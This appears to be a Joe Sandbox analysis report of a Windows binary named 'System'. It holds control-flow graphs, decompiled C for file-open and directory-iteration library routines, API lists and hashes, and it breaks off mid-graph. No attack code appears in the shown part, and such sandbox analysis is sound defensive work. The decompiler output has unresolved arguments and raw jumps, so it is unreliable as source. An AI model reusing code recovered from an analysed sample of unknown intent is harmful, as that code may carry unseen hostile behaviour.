                                                                                                                                                              control_flow_graph 812 7ff6e4c84030-7ff6e4c840a3 call 7ff6e4c83c14 815 7ff6e4c840bd-7ff6e4c840c7 call 7ff6e4c7ac2c 812->815 816 7ff6e4c840a5-7ff6e4c840ae call 7ff6e4c6c834 812->816 822 7ff6e4c840c9-7ff6e4c840e0 call 7ff6e4c6c834 call 7ff6e4c6c854 815->822 823 7ff6e4c840e2-7ff6e4c8414b CreateFileW 815->823 821 7ff6e4c840b1-7ff6e4c840b8 call 7ff6e4c6c854 816->821 839 7ff6e4c843f6-7ff6e4c84416 821->839 822->821 824 7ff6e4c8414d-7ff6e4c84153 823->824 825 7ff6e4c841c8-7ff6e4c841d3 GetFileType 823->825 828 7ff6e4c84195-7ff6e4c841c3 GetLastError call 7ff6e4c6c7e4 824->828 829 7ff6e4c84155-7ff6e4c84159 824->829 831 7ff6e4c84226-7ff6e4c8422d 825->831 832 7ff6e4c841d5-7ff6e4c84210 GetLastError call 7ff6e4c6c7e4 CloseHandle 825->832 828->821 829->828 837 7ff6e4c8415b-7ff6e4c84193 CreateFileW 829->837 835 7ff6e4c84235-7ff6e4c84238 831->835 836 7ff6e4c8422f-7ff6e4c84233 831->836 832->821 847 7ff6e4c84216-7ff6e4c84221 call 7ff6e4c6c854 832->847 842 7ff6e4c8423e-7ff6e4c8428f call 7ff6e4c7ab44 835->842 843 7ff6e4c8423a 835->843 836->842 837->825 837->828 850 7ff6e4c84291-7ff6e4c8429d call 7ff6e4c83e20 842->850 851 7ff6e4c842ae-7ff6e4c842de call 7ff6e4c83980 842->851 843->842 847->821 850->851 859 7ff6e4c8429f 850->859 857 7ff6e4c842a1-7ff6e4c842a9 call 7ff6e4c76c80 851->857 858 7ff6e4c842e0-7ff6e4c84323 851->858 857->839 860 7ff6e4c84345-7ff6e4c84350 858->860 861 7ff6e4c84325-7ff6e4c84329 858->861 859->857 864 7ff6e4c84356-7ff6e4c8435a 860->864 865 7ff6e4c843f4 860->865 861->860 863 7ff6e4c8432b-7ff6e4c84340 861->863 863->860 864->865 867 7ff6e4c84360-7ff6e4c843a5 CloseHandle CreateFileW 864->867 865->839 868 7ff6e4c843da-7ff6e4c843ef 867->868 869 7ff6e4c843a7-7ff6e4c843d5 GetLastError call 7ff6e4c6c7e4 call 7ff6e4c7ad6c 867->869 868->865 869->868
                                                                                                                                                              C-Code - Quality: 41%
                                                                                                                                                              			E00007FF67FF6E4C84030(void* __ecx, void* __edi, void* __eflags, long long __rbx, void* __rcx, signed int* __rdx, long long __rdi, long long __rsi, long long __r8) {
				void* __rbp;
				void* _t163;
				void* _t174;
				void* _t175;
				void* _t176;
				void* _t177;
				void* _t179;
				intOrPtr* _t200;
				unsigned long long _t201;
				signed long long _t204;
				signed long long _t206;
				signed long long _t209;
				long long _t215;
				long long _t216;
				long long _t224;
				signed long long _t234;
				signed long long _t235;
				signed long long _t244;
				signed long long _t258;
				signed long long _t267;
				intOrPtr _t269;
				signed long long _t270;
				signed long long _t297;
				signed int* _t302;
				void* _t310;
				void* _t311;
				intOrPtr* _t313;
				void* _t314;
				void* _t322;
				void* _t324;
				void* _t327;
				void* _t331;

				_t179 = __edi;
				_t177 = __ecx;
				_t200 = _t313;
				 *((long long*)(_t200 + 8)) = __rbx;
				 *((long long*)(_t200 + 0x10)) = __rsi;
				 *((long long*)(_t200 + 0x20)) = __rdi;
				 *((long long*)(_t200 + 0x18)) = __r8;
				_t311 = _t200 - 0x47;
				_t314 = _t313 - 0xb0;
				r12d = r9d;
				r9d =  *(_t311 + 0x77);
				_t302 = __rdx;
				r8d =  *(_t311 + 0x6f);
				E00007FF67FF6E4C83C14(r12d, __eflags, _t200, __r8, _t311 - 1, _t311);
				asm("movups xmm0, [eax]");
				asm("movsd xmm1, [eax+0x10]");
				asm("movups [ebp-0x49], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("dec cx");
				asm("movsd [ebp-0x31], xmm1");
				asm("movsd [ebp-0x39], xmm1");
				 *(_t311 - 0x21) = _t331 >> 0x20;
				if (r15d != 0xffffffff) goto 0xe4c840bd;
				E00007FF67FF6E4C6C834(_t200);
				 *_t200 = 0;
				 *__rdx =  *__rdx | 0xffffffff;
				E00007FF67FF6E4C6C854(_t200);
				_t201 =  *_t200;
				goto 0xe4c843f6;
				E00007FF67FF6E4C7AC2C(r12d, _t201, __r8, _t311 - 1, __rdx, __rdx, 0);
				 *__rdx = _t201;
				if (_t201 != 0xffffffff) goto 0xe4c840e2;
				E00007FF67FF6E4C6C834(_t201);
				 *_t201 = 0;
				 *__rdx =  *__rdx | 0xffffffff;
				E00007FF67FF6E4C6C854(_t201);
				 *_t201 = 0x18;
				goto 0xe4c840b1;
				r8d = r15d;
				r14d = r14d |  *(_t311 - 0x39);
				_t204 =  !(_t201 >> 7) & 0x00000001;
				 *((long long*)(0)) = 1;
				 *((long long*)(_t314 + 0x30)) = 0;
				 *(_t314 + 0x28) = r14d;
				 *((long long*)(_t314 + 0x20)) =  *((intOrPtr*)(_t311 - 0x41));
				 *((long long*)(_t311 - 0x19)) = 0x18;
				 *((long long*)(_t311 - 0x11)) = 0;
				 *(_t311 - 9) = _t204;
				 *(_t311 - 0x29) =  *(_t311 - 0x39) >> 0x20;
				CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
				_t234 =  *(_t311 - 0x45);
				if (_t204 != 0xffffffff) goto 0xe4c841c8;
				_t206 = _t234 & 0xc0000000;
				if (_t206 != 0xc0000000) goto 0xe4c84195;
				if ((r12b & 0x00000001) == 0) goto 0xe4c84195;
				 *((long long*)(_t314 + 0x30)) = 0;
				asm("btr ebx, 0x1f");
				 *(_t311 - 0x45) = _t234;
				r8d = r15d;
				 *(_t314 + 0x28) = r14d;
				 *((long long*)(_t314 + 0x20)) =  *((intOrPtr*)(_t311 - 0x41));
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				if (_t206 != 0xffffffff) goto 0xe4c841c8;
				_t244 =  *__rdx;
				_t209 =  *((intOrPtr*)(0xe4cab700 + (_t244 >> 6) * 8));
				 *(_t209 + 0x38 + ((_t244 & 0x0000003f) + (_t244 & 0x0000003f) * 8) * 8) =  *(_t209 + 0x38 + ((_t244 & 0x0000003f) + (_t244 & 0x0000003f) * 8) * 8) & 0x000000fe;
				GetLastError();
				E00007FF67FF6E4C6C7E4(_t177, _t209, _t234);
				goto 0xe4c840b1;
				GetFileType(_t331); // executed
				if (_t209 != 0) goto 0xe4c84226;
				GetLastError();
				_t235 = _t209;
				E00007FF67FF6E4C6C7E4(_t177, _t209, _t235);
				 *( *((intOrPtr*)(0xe4cab700 + ( *__rdx >> 6) * 8)) + 0x38 + (( *__rdx & 0x0000003f) + ( *__rdx & 0x0000003f) * 8) * 8) =  *( *((intOrPtr*)(0xe4cab700 + ( *__rdx >> 6) * 8)) + 0x38 + (( *__rdx & 0x0000003f) + ( *__rdx & 0x0000003f) * 8) * 8) & 0x000000fe;
				CloseHandle(_t327);
				if (_t235 != 0) goto 0xe4c840b1;
				_t163 = E00007FF67FF6E4C6C854(_t209);
				 *_t209 = 0xd;
				goto 0xe4c840b1;
				r14b =  *(_t311 - 0x49);
				if (_t209 != 2) goto 0xe4c84235;
				r14b = r14b | 0x00000040;
				goto 0xe4c8423e;
				if (_t209 != 3) goto 0xe4c8423e;
				r14b = r14b | 0x00000008;
				E00007FF67FF6E4C7AB44(_t163, _t176, _t177, _t235, _t206, __rdx, 0, _t311, _t324, _t322);
				r14b = r14b | 0x00000001;
				 *(_t311 - 0x49) = r14b;
				 *( *((intOrPtr*)(0xe4cab700 + ( *__rdx >> 6) * 8)) + 0x38 + (( *__rdx & 0x0000003f) + ( *__rdx & 0x0000003f) * 8) * 8) = r14b;
				_t258 =  *__rdx;
				_t215 =  *((intOrPtr*)(0xe4cab700 + (_t258 >> 6) * 8));
				 *((intOrPtr*)(_t215 + 0x39 + ((_t258 & 0x0000003f) + (_t258 & 0x0000003f) * 8) * 8)) = sil;
				if ((r12b & 0x00000002) == 0) goto 0xe4c842ae;
				E00007FF67FF6E4C83E20(_t176, _t177, r12d, _t235, _t311 - 0x19);
				 *((long long*)(_t311 - 0x4d)) = _t215;
				if (_t215 == 0) goto 0xe4c842ae;
				E00007FF67FF6E4C76C80(_t177, r12d, _t179, _t215, _t235);
				_t216 =  *((intOrPtr*)(_t311 - 0x4d));
				goto 0xe4c843f6;
				asm("movups xmm0, [ebp-0x49]");
				asm("movsd xmm1, [ebp-0x31]");
				r8d = r12d;
				asm("movaps [ebp-0x1], xmm0");
				 *((intOrPtr*)(_t311 - 0x51)) = sil;
				asm("movsd [ebp+0xf], xmm1");
				E00007FF67FF6E4C83980(_t177, _t235, _t311 - 1, 0, _t311 - 0x51);
				 *((long long*)(_t311 - 0x4d)) = _t216;
				if (_t216 != 0) goto 0xe4c842a1;
				 *((char*)( *((intOrPtr*)(0xe4cab700 + ( *_t302 >> 6) * 8)) + 0x39 + (( *_t302 & 0x0000003f) + ( *_t302 & 0x0000003f) * 8) * 8)) =  *((intOrPtr*)(_t311 - 0x51));
				_t267 =  *_t302;
				_t297 = (_t267 & 0x0000003f) + (_t267 & 0x0000003f) * 8;
				_t269 =  *((intOrPtr*)(0xe4cab700 + (_t267 >> 6) * 8));
				 *(_t269 + 0x3d + _t297 * 8) =  *(_t269 + 0x3d + _t297 * 8) & 0x000000fe;
				 *(_t269 + 0x3d + _t297 * 8) =  *(_t269 + 0x3d + _t297 * 8) | r12d & 0x00000001;
				if ((r14b & 0x00000048) != 0) goto 0xe4c84345;
				if ((r12b & 0x00000008) == 0) goto 0xe4c84345;
				_t270 =  *_t302;
				_t224 =  *((intOrPtr*)(0xe4cab700 + (_t270 >> 6) * 8));
				 *(_t224 + 0x38 + ((_t270 & 0x0000003f) + (_t270 & 0x0000003f) * 8) * 8) =  *(_t224 + 0x38 + ((_t270 & 0x0000003f) + (_t270 & 0x0000003f) * 8) * 8) | 0x00000020;
				if (_t224 != 0xc0000000) goto 0xe4c843f4;
				if ((r12b & 0x00000001) == 0) goto 0xe4c843f4;
				CloseHandle(_t310);
				r8d =  *(_t311 - 0x21);
				asm("btr ebx, 0x1f");
				 *((long long*)(_t314 + 0x30)) = 0;
				 *(_t314 + 0x28) =  *(_t311 - 0x29);
				 *((long long*)(_t314 + 0x20)) =  *((intOrPtr*)(_t311 - 0x41));
				 *(_t311 - 0x45) = _t235;
				CreateFileW(??, ??, ??, ??, ??, ??, ??);
				if (_t224 != 0xffffffff) goto 0xe4c843da;
				GetLastError();
				_t174 = E00007FF67FF6E4C6C7E4(_t177, _t224, _t235);
				 *( *((intOrPtr*)(0xe4cab700 + ( *_t302 >> 6) * 8)) + 0x38 + (( *_t302 & 0x0000003f) + ( *_t302 & 0x0000003f) * 8) * 8) =  *( *((intOrPtr*)(0xe4cab700 + ( *_t302 >> 6) * 8)) + 0x38 + (( *_t302 & 0x0000003f) + ( *_t302 & 0x0000003f) * 8) * 8) & 0x000000fe;
				_t175 = E00007FF67FF6E4C7AD6C(_t174, _t176, _t177, _t235, _t302, 0);
				goto 0xe4c840b1;
				 *((long long*)( *((intOrPtr*)(0xe4cab700 + ( *_t302 >> 6) * 8)) + 0x28 + (( *_t302 & 0x0000003f) + ( *_t302 & 0x0000003f) * 8) * 8)) = _t224;
				return _t175;
			}



































                                                                                                                                                              0x7ff6e4c84030
                                                                                                                                                              0x7ff6e4c84030
                                                                                                                                                              0x7ff6e4c84030
                                                                                                                                                              0x7ff6e4c84033
                                                                                                                                                              0x7ff6e4c84037
                                                                                                                                                              0x7ff6e4c8403b
                                                                                                                                                              0x7ff6e4c8403f
                                                                                                                                                              0x7ff6e4c8404c
                                                                                                                                                              0x7ff6e4c84050
                                                                                                                                                              0x7ff6e4c84057
                                                                                                                                                              0x7ff6e4c8405d
                                                                                                                                                              0x7ff6e4c84061
                                                                                                                                                              0x7ff6e4c84064
                                                                                                                                                              0x7ff6e4c84072
                                                                                                                                                              0x7ff6e4c84077
                                                                                                                                                              0x7ff6e4c8407a
                                                                                                                                                              0x7ff6e4c8407f
                                                                                                                                                              0x7ff6e4c84083
                                                                                                                                                              0x7ff6e4c84088
                                                                                                                                                              0x7ff6e4c8408d
                                                                                                                                                              0x7ff6e4c84096
                                                                                                                                                              0x7ff6e4c8409b
                                                                                                                                                              0x7ff6e4c840a3
                                                                                                                                                              0x7ff6e4c840a5
                                                                                                                                                              0x7ff6e4c840ac
                                                                                                                                                              0x7ff6e4c840ae
                                                                                                                                                              0x7ff6e4c840b1
                                                                                                                                                              0x7ff6e4c840b6
                                                                                                                                                              0x7ff6e4c840b8
                                                                                                                                                              0x7ff6e4c840bd
                                                                                                                                                              0x7ff6e4c840c2
                                                                                                                                                              0x7ff6e4c840c7
                                                                                                                                                              0x7ff6e4c840c9
                                                                                                                                                              0x7ff6e4c840d0
                                                                                                                                                              0x7ff6e4c840d2
                                                                                                                                                              0x7ff6e4c840d5
                                                                                                                                                              0x7ff6e4c840da
                                                                                                                                                              0x7ff6e4c840e0
                                                                                                                                                              0x7ff6e4c840f4
                                                                                                                                                              0x7ff6e4c84100
                                                                                                                                                              0x7ff6e4c84104
                                                                                                                                                              0x7ff6e4c84107
                                                                                                                                                              0x7ff6e4c8410f
                                                                                                                                                              0x7ff6e4c84114
                                                                                                                                                              0x7ff6e4c84119
                                                                                                                                                              0x7ff6e4c84124
                                                                                                                                                              0x7ff6e4c8412b
                                                                                                                                                              0x7ff6e4c8412f
                                                                                                                                                              0x7ff6e4c84132
                                                                                                                                                              0x7ff6e4c84136
                                                                                                                                                              0x7ff6e4c8413c
                                                                                                                                                              0x7ff6e4c8414b
                                                                                                                                                              0x7ff6e4c8414f
                                                                                                                                                              0x7ff6e4c84153
                                                                                                                                                              0x7ff6e4c84159
                                                                                                                                                              0x7ff6e4c84162
                                                                                                                                                              0x7ff6e4c84167
                                                                                                                                                              0x7ff6e4c8416b
                                                                                                                                                              0x7ff6e4c8416e
                                                                                                                                                              0x7ff6e4c84175
                                                                                                                                                              0x7ff6e4c8417a
                                                                                                                                                              0x7ff6e4c84186
                                                                                                                                                              0x7ff6e4c84193
                                                                                                                                                              0x7ff6e4c84195
                                                                                                                                                              0x7ff6e4c841ad
                                                                                                                                                              0x7ff6e4c841b1
                                                                                                                                                              0x7ff6e4c841b6
                                                                                                                                                              0x7ff6e4c841be
                                                                                                                                                              0x7ff6e4c841c3
                                                                                                                                                              0x7ff6e4c841cb
                                                                                                                                                              0x7ff6e4c841d3
                                                                                                                                                              0x7ff6e4c841d5
                                                                                                                                                              0x7ff6e4c841dd
                                                                                                                                                              0x7ff6e4c841df
                                                                                                                                                              0x7ff6e4c84200
                                                                                                                                                              0x7ff6e4c84208
                                                                                                                                                              0x7ff6e4c84210
                                                                                                                                                              0x7ff6e4c84216
                                                                                                                                                              0x7ff6e4c8421b
                                                                                                                                                              0x7ff6e4c84221
                                                                                                                                                              0x7ff6e4c84226
                                                                                                                                                              0x7ff6e4c8422d
                                                                                                                                                              0x7ff6e4c8422f
                                                                                                                                                              0x7ff6e4c84233
                                                                                                                                                              0x7ff6e4c84238
                                                                                                                                                              0x7ff6e4c8423a
                                                                                                                                                              0x7ff6e4c84243
                                                                                                                                                              0x7ff6e4c84255
                                                                                                                                                              0x7ff6e4c84260
                                                                                                                                                              0x7ff6e4c8426c
                                                                                                                                                              0x7ff6e4c84271
                                                                                                                                                              0x7ff6e4c84282
                                                                                                                                                              0x7ff6e4c84286
                                                                                                                                                              0x7ff6e4c8428f
                                                                                                                                                              0x7ff6e4c84293
                                                                                                                                                              0x7ff6e4c84298
                                                                                                                                                              0x7ff6e4c8429d
                                                                                                                                                              0x7ff6e4c842a1
                                                                                                                                                              0x7ff6e4c842a6
                                                                                                                                                              0x7ff6e4c842a9
                                                                                                                                                              0x7ff6e4c842ae
                                                                                                                                                              0x7ff6e4c842b8
                                                                                                                                                              0x7ff6e4c842c1
                                                                                                                                                              0x7ff6e4c842c4
                                                                                                                                                              0x7ff6e4c842c8
                                                                                                                                                              0x7ff6e4c842cc
                                                                                                                                                              0x7ff6e4c842d1
                                                                                                                                                              0x7ff6e4c842d9
                                                                                                                                                              0x7ff6e4c842de
                                                                                                                                                              0x7ff6e4c842f5
                                                                                                                                                              0x7ff6e4c842f9
                                                                                                                                                              0x7ff6e4c84306
                                                                                                                                                              0x7ff6e4c8430a
                                                                                                                                                              0x7ff6e4c84316
                                                                                                                                                              0x7ff6e4c8431b
                                                                                                                                                              0x7ff6e4c84323
                                                                                                                                                              0x7ff6e4c84329
                                                                                                                                                              0x7ff6e4c8432b
                                                                                                                                                              0x7ff6e4c8433c
                                                                                                                                                              0x7ff6e4c84340
                                                                                                                                                              0x7ff6e4c84350
                                                                                                                                                              0x7ff6e4c8435a
                                                                                                                                                              0x7ff6e4c84363
                                                                                                                                                              0x7ff6e4c84371
                                                                                                                                                              0x7ff6e4c84375
                                                                                                                                                              0x7ff6e4c84379
                                                                                                                                                              0x7ff6e4c8437e
                                                                                                                                                              0x7ff6e4c84385
                                                                                                                                                              0x7ff6e4c8438d
                                                                                                                                                              0x7ff6e4c84398
                                                                                                                                                              0x7ff6e4c843a5
                                                                                                                                                              0x7ff6e4c843a7
                                                                                                                                                              0x7ff6e4c843af
                                                                                                                                                              0x7ff6e4c843c9
                                                                                                                                                              0x7ff6e4c843d0
                                                                                                                                                              0x7ff6e4c843d5
                                                                                                                                                              0x7ff6e4c843ef
                                                                                                                                                              0x7ff6e4c84416

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1330151763-0
                                                                                                                                                              • Opcode ID: ab8994ed691e28767cbfe096fbe4a80e7c4932238c3333e658feacb1f95b8692
                                                                                                                                                              • Instruction ID: df8e5bacb38c383635099eede696013261d2e852a1bcaaea0184591a131ce708
                                                                                                                                                              • Opcode Fuzzy Hash: ab8994ed691e28767cbfe096fbe4a80e7c4932238c3333e658feacb1f95b8692
                                                                                                                                                              • Instruction Fuzzy Hash: A6C1913BB64A4286EB10CF75C4802AD3771EB89F98B115226DE1E977D5DF3AE052C305
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C47100 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 375COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 874 7ff6e4c47100-7ff6e4c47136 875 7ff6e4c47138 874->875 876 7ff6e4c4713b-7ff6e4c47192 call 7ff6e4c4a820 call 7ff6e4c609d4 874->876 875->876 881 7ff6e4c4720e-7ff6e4c47211 876->881 882 7ff6e4c47194-7ff6e4c4719f 876->882 883 7ff6e4c47225 881->883 884 7ff6e4c47213-7ff6e4c47216 881->884 885 7ff6e4c471a1-7ff6e4c471ad 882->885 886 7ff6e4c47203-7ff6e4c4720c 882->886 889 7ff6e4c4722a-7ff6e4c47232 883->889 884->883 888 7ff6e4c47218-7ff6e4c4721b 884->888 890 7ff6e4c471af 885->890 891 7ff6e4c471f5-7ff6e4c471fa 885->891 887 7ff6e4c471b2-7ff6e4c471bb 886->887 895 7ff6e4c471c1-7ff6e4c471d8 887->895 896 7ff6e4c47242-7ff6e4c47245 887->896 888->883 892 7ff6e4c4721d-7ff6e4c47223 888->892 893 7ff6e4c47238 889->893 894 7ff6e4c47616-7ff6e4c47627 call 7ff6e4c43a80 889->894 890->887 891->886 897 7ff6e4c471fc-7ff6e4c47201 891->897 892->883 892->889 893->887 912 7ff6e4c47628-7ff6e4c4763b call 7ff6e4c43a80 894->912 901 7ff6e4c4723d call 7ff6e4c623d0 895->901 902 7ff6e4c471da-7ff6e4c471ed 895->902 899 7ff6e4c47247-7ff6e4c47249 896->899 900 7ff6e4c4724e-7ff6e4c47257 896->900 897->887 905 7ff6e4c475e7-7ff6e4c4760f call 7ff6e4c623b0 899->905 906 7ff6e4c47259 900->906 907 7ff6e4c4725c-7ff6e4c472a3 call 7ff6e4c4a820 call 7ff6e4c4b4d0 900->907 901->896 908 7ff6e4c47610-7ff6e4c47615 call 7ff6e4c6a5f8 902->908 909 7ff6e4c471f3 902->909 906->907 907->912 922 7ff6e4c472a9-7ff6e4c472b2 907->922 908->894 909->901 921 7ff6e4c4763c-7ff6e4c47641 call 7ff6e4c6a5f8 912->921 927 7ff6e4c47642-7ff6e4c47651 call 7ff6e4c43a80 921->927 924 7ff6e4c472eb-7ff6e4c47301 922->924 925 7ff6e4c472b4-7ff6e4c472cb 922->925 930 7ff6e4c4730f-7ff6e4c47323 924->930 931 7ff6e4c47303-7ff6e4c47307 924->931 928 7ff6e4c472e6 call 7ff6e4c623d0 925->928 929 7ff6e4c472cd-7ff6e4c472e0 925->929 936 7ff6e4c47656-7ff6e4c4765b call 7ff6e4c6a5f8 927->936 928->924 929->921 929->928 934 7ff6e4c47331-7ff6e4c47345 930->934 935 7ff6e4c47325-7ff6e4c47329 930->935 931->930 937 7ff6e4c47347-7ff6e4c47351 934->937 938 7ff6e4c4738a 934->938 935->934 949 7ff6e4c4765c-7ff6e4c47661 call 7ff6e4c6a5f8 936->949 941 7ff6e4c47353-7ff6e4c4736d 937->941 942 7ff6e4c47382 937->942 940 7ff6e4c47392-7ff6e4c4739d 938->940 944 7ff6e4c47560-7ff6e4c4756b 940->944 945 7ff6e4c473a3-7ff6e4c473ec call 7ff6e4c49c50 call 7ff6e4c609d4 940->945 941->942 951 7ff6e4c4736f-7ff6e4c47380 941->951 942->938 947 7ff6e4c4756d-7ff6e4c47577 944->947 948 7ff6e4c475ab-7ff6e4c475ae 944->948 968 7ff6e4c4747c-7ff6e4c4747f 945->968 969 7ff6e4c473f2-7ff6e4c473fd 945->969 952 7ff6e4c47579-7ff6e4c47593 947->952 953 7ff6e4c475a3 947->953 955 7ff6e4c475b0-7ff6e4c475ba 948->955 956 7ff6e4c475e5 948->956 963 7ff6e4c47662-7ff6e4c47696 call 7ff6e4c43990 call 7ff6e4c4b240 949->963 951->938 952->953 965 7ff6e4c47595-7ff6e4c4759d 952->965 953->948 955->956 959 7ff6e4c475bc-7ff6e4c475d4 955->959 956->905 959->956 973 7ff6e4c475d6-7ff6e4c475e4 959->973 1001 7ff6e4c47698-7ff6e4c476a6 963->1001 1002 7ff6e4c476a7-7ff6e4c476f7 963->1002 965->953 970 7ff6e4c47481-7ff6e4c47484 968->970 971 7ff6e4c47493 968->971 974 7ff6e4c47471-7ff6e4c4747a 969->974 975 7ff6e4c473ff-7ff6e4c4740b 969->975 970->971 977 7ff6e4c47486-7ff6e4c47489 970->977 979 7ff6e4c47498-7ff6e4c474a0 971->979 973->956 976 7ff6e4c47412-7ff6e4c47415 974->976 980 7ff6e4c4740d 975->980 981 7ff6e4c47463-7ff6e4c47468 975->981 982 7ff6e4c4741b-7ff6e4c47436 call 7ff6e4c49c50 976->982 983 7ff6e4c474fe-7ff6e4c4750a 976->983 977->971 985 7ff6e4c4748b-7ff6e4c47491 977->985 979->927 987 7ff6e4c474a6 979->987 980->976 981->974 984 7ff6e4c4746a-7ff6e4c4746f 981->984 997 7ff6e4c47438-7ff6e4c47461 982->997 998 7ff6e4c474ab-7ff6e4c474b8 call 7ff6e4c4b8a0 982->998 990 7ff6e4c47546-7ff6e4c4754e call 7ff6e4c43ea0 983->990 991 7ff6e4c4750c-7ff6e4c47526 983->991 984->976 985->971 985->979 987->976 1000 7ff6e4c47553-7ff6e4c47555 990->1000 993 7ff6e4c47528-7ff6e4c4753b 991->993 994 7ff6e4c47541 call 7ff6e4c623d0 991->994 993->949 993->994 994->990 1003 7ff6e4c474c0-7ff6e4c474c4 997->1003 998->1003 1000->963 1005 7ff6e4c4755b 1000->1005 1003->983 1007 7ff6e4c474c6-7ff6e4c474dd 1003->1007 1005->940 1008 7ff6e4c474f8-7ff6e4c474fd call 7ff6e4c623d0 1007->1008 1009 7ff6e4c474df-7ff6e4c474f2 1007->1009 1008->983 1009->936 1009->1008
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000B.00000002.401874825.00007FF6E4C41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF6E4C40000, based on PE: true
                                                                                                                                                              • Associated: 0000000B.00000002.401841691.00007FF6E4C40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.401978343.00007FF6E4C89000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402012688.00007FF6E4CA9000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              • Associated: 0000000B.00000002.402023641.00007FF6E4CAC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_11_2_7ff6e4c40000_System.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                              • String ID: recursive_directory_iterator::recursive_directory_iterator$status
                                                                                                                                                              • API String ID: 3668304517-199609307
                                                                                                                                                              • Opcode ID: a7c4b51d841fe47c61be7c6a2234add7fdaf849fb2d0926d64a3de8b3d56965a
                                                                                                                                                              • Instruction ID: 0b3f172270c847387f74c90db5c2a22bee4ab70471cc42fb298353a50403238a
                                                                                                                                                              • Opcode Fuzzy Hash: a7c4b51d841fe47c61be7c6a2234add7fdaf849fb2d0926d64a3de8b3d56965a
                                                                                                                                                              • Instruction Fuzzy Hash: D6F1B13BA49A8281EA608B35E5843BD6371EB85FE4F148132DA5D83A95DF3DD4C2C706
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF6E4C78A0C Relevance: 10.8, APIs: 7, Instructions: 291COMMONLIBRARYCODE
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1012 7ff6e4c78a0c-7ff6e4c78a32 1013 7ff6e4c78a4d-7ff6e4c78a51 1012->1013 1014 7ff6e4c78a34-7ff6e4c78a48 call 7ff6e4c6c834 call 7ff6e4c6c854 1012->1014 1016 7ff6e4c78a57-7ff6e4c78a5e 1013->1016 1017 7ff6e4c78e30-7ff6e4c78e3c call 7ff6e4c6c834 call 7ff6e4c6c854 1013->1017 1030 7ff6e4c78e47 1014->1030 1016->1017 1019 7ff6e4c78a64-7ff6e4c78a96 1016->1019 1036 7ff6e4c78e42 call 7ff6e4c6a5d8 1017->1036 1019->1017 1022 7ff6e4c78a9c-7ff6e4c78aa3 1019->1022 1025 7ff6e4c78abc-7ff6e4c78abf 1022->1025 1026 7ff6e4c78aa5-7ff6e4c78ab7 call 7ff6e4c6c834 call 7ff6e4c6c854 1022->1026 1028 7ff6e4c78e2c-7ff6e4c78e2e 1025->1028 1029 7ff6e4c78ac5-7ff6e4c78ac7 1025->1029 1026->1036 1033 7ff6e4c78e4a-7ff6e4c78e61 1028->1033 1029->1028 1034 7ff6e4c78acd-7ff6e4c78ad0 1029->1034 1030->1033 1034->1026 1037 7ff6e4c78ad2-7ff6e4c78af8 1034->1037 1036->1030 1040 7ff6e4c78afa-7ff6e4c78afd 1037->1040 1041 7ff6e4c78b37-7ff6e4c78b3f 1037->1041 1043 7ff6e4c78b25-7ff6e4c78b32 1040->1043 1044 7ff6e4c78aff-7ff6e4c78b07 1040->1044 1045 7ff6e4c78b09-7ff6e4c78b20 call 7ff6e4c6c834 call 7ff6e4c6c854 call 7ff6e4c6a5d8 1041->1045 1046 7ff6e4c78b41-7ff6e4c78b69 call 7ff6e4c782bc call 7ff6e4c76b28 * 2 1041->1046 1049 7ff6e4c78bbb-7ff6e4c78bce 1043->1049 1044->1043 1044->1045 1077 7ff6e4c78cc0 1045->1077 1073 7ff6e4c78b6b-7ff6e4c78b81 call 7ff6e4c6c854 call 7ff6e4c6c834 1046->1073 1074 7ff6e4c78b86-7ff6e4c78bb7 call 7ff6e4c78ff8 1046->1074 1052 7ff6e4c78c4a-7ff6e4c78c54 call 7ff6e4c81c3c 1049->1052 1053 7ff6e4c78bd0-7ff6e4c78bd8 1049->1053 1065 7ff6e4c78c5a-7ff6e4c78c6f 1052->1065 1066 7ff6e4c78cde 1052->1066 1053->1052 1054 7ff6e4c78bda-7ff6e4c78bdc 1053->1054 1054->1052 1058 7ff6e4c78bde-7ff6e4c78bf5 1054->1058 1058->1052 1062 7ff6e4c78bf7-7ff6e4c78c03 1058->1062 1062->1052 1067 7ff6e4c78c05-7ff6e4c78c07 